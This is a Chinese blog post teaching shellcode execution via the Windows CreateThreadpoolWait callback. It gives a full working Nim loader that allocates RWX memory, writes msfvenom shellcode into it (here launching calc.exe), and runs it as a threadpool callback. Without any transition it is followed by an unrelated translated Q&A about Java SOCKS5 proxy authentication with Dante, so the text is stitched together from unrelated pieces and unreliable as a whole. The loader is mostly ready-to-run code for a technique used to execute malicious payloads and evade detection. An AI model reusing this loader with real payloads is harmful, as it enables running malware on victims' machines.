通过CreateThreadpoolWait执行shellcode（nim学习系列）

Posted 2023-05-17 学习委员*尼姆大人

首先通过CreateEvent函数创建一个signaled的事件对象，也就是第三个参数必须为TRUE。否则shellcode将不会得到执行，且进程将一直等待下去。

使用CreateThreadpoolWait函数创建一个线程池等待回调，我们只需要关心第一个参数也就是等待完成或者超时后要执行的回调函数，这里我们将该回调函数设置为shellcode。

使用SetThreadpoolWait函数将等待对象和第一步创建的句柄绑定，一个等待对象只能等待几个句柄。当句柄对象变成signaled或超时后会执行等待对象的回调函数。

使用WaitForSingleObject对第一步的事件对象进行等待。由于我们的事件对象本身就是signaled的，所以设置的回调函数会立马得到执行。如此就执行了shellcode。

import winim
import winim/lean

proc myThread[I, T](shellcode: array[I, T]): void =
    let tProcess = GetCurrentProcessId()
    echo "Current Process ID: ", tProcess
    var pHandle: HANDLE = OpenProcess(PROCESS_ALL_ACCESS, FALSE, tProcess)
    
    let rPtr = VirtualAllocEx(
        pHandle,
        NULL,
        cast[SIZE_T](shellcode.len),
        MEM_COMMIT,
        PAGE_EXECUTE_READ_WRITE
    )

    var bytesWritten: SIZE_T
    let wSuccess = WriteProcessMemory(
        pHandle, 
        rPtr,
        unsafeAddr shellcode,
        cast[SIZE_T](shellcode.len),
        addr bytesWritten
    )
    let shellcodeAddress = cast[PTP_WAIT_CALLBACK](rPtr) 
    var event: HANDLE = CreateEvent(NULL, FALSE, TRUE, NULL)
    var threadPoolWait: PTP_WAIT = CreateThreadpoolWait((PTP_WAIT_CALLBACK)shellcodeAddress, NULL, NULL)
    SetThreadpoolWait(threadPoolWait, event, NULL)
    WaitForSingleObject(event, INFINITE)

when defined(windows):
    # https://github.com/nim-lang/Nim/wiki/Consts-defined-by-the-compiler
    when defined(i386):
        # msfvenom -p windows/exec CMD=calc.exe -f csharp, then modified for Nim arrays
        echo "[*] Running in x86 process"
        var shellcode: array[193, byte] = [byte 0xfc,0xe8,0x82,0x00,0x00,0x00,
        0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,
        0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
        0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,
        0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,
        0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,
        0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,
        0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
        0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,
        0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,
        0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,
        0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x6a,
        0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
        0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,
        0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,
        0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63,0x61,
        0x6c,0x63,0x2e,0x65,0x78,0x65,0x00]


    elif defined(amd64):
        # msfvenom -p windows/x64/exec CMD=calc.exe -f csharp, then modified for Nim arrays
        echo "[*] Running in x64 process"
        var shellcode: array[276, byte] = [byte 0xfc,0x48,0x83,0xe4,0xf0,0xe8,
        0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,
        0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
        0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,
        0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,
        0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,
        0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,
        0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
        0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,
        0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,
        0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,
        0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
        0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
        0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,
        0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,
        0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,
        0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
        0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
        0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,
        0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,
        0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,
        0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,
        0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
        0x63,0x2e,0x65,0x78,0x65,0x00]     

    # This is essentially the equivalent of \'if __name__ == \'__main__\' in python
    when isMainModule:
        myThread(shellcode)

From: https://www.cnblogs.com/StudyCat/p/17410246.html

连接到 SOCKS5 代理以在 Java 中执行 FTP/S

【中文标题】连接到 SOCKS5 代理以在 Java 中执行 FTP/S

【英文标题】：Connecting to a SOCKS5 proxy to do FTP/S in Java

【发布时间】：2010-10-20 21:55:51

【问题描述】：

我正在编写一个作业，它将通过我的 SOCKS5 代理连接到客户端的 FTP/S 服务器，并且我正在使用 Apache Commons Net 包。问题是我的 SOCKS 代理配置为不需要身份验证，但我仍然收到以下异常：

java.net.SocketException: SOCKS : authentication failed
    at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:443)
    at java.net.Socket.connect(Socket.java:519)

我尝试将 java.net.socks.username 和 password 属性设置为空字符串，但我仍然明白。有没有办法告诉代码不使用身份验证？深入研究底层来源，我几乎认为它正在查询代理服务器的身份验证要求，但我不确定。

【参考方案1】：

好的，所以问题是我的 SOCKS 代理 已设置 要求进行身份验证，但也接受未经过身份验证的连接。我们使用Dante，虽然像 Filezilla 这样的程序足够聪明，可以遍历所有可接受的身份验证方法，但似乎 java.net 包只使用了提供的第一种方法。由于我的 sockd.conf 文件中的身份验证配置如下：

method: username none
user.notprivileged: nobody

java.net 要求用户名和密码。我只是将方法翻转为“无用户名”，Filezilla 和 java.net 都正确地通过了代理。这有点像 IT 解决方案，但不管怎样让代码工作，对吧？

【讨论】：

感谢您抽出宝贵时间回答您自己的问题。我遇到了完全相同的问题，这就是解决方案：D

非常感谢。自己永远不会想到这一点。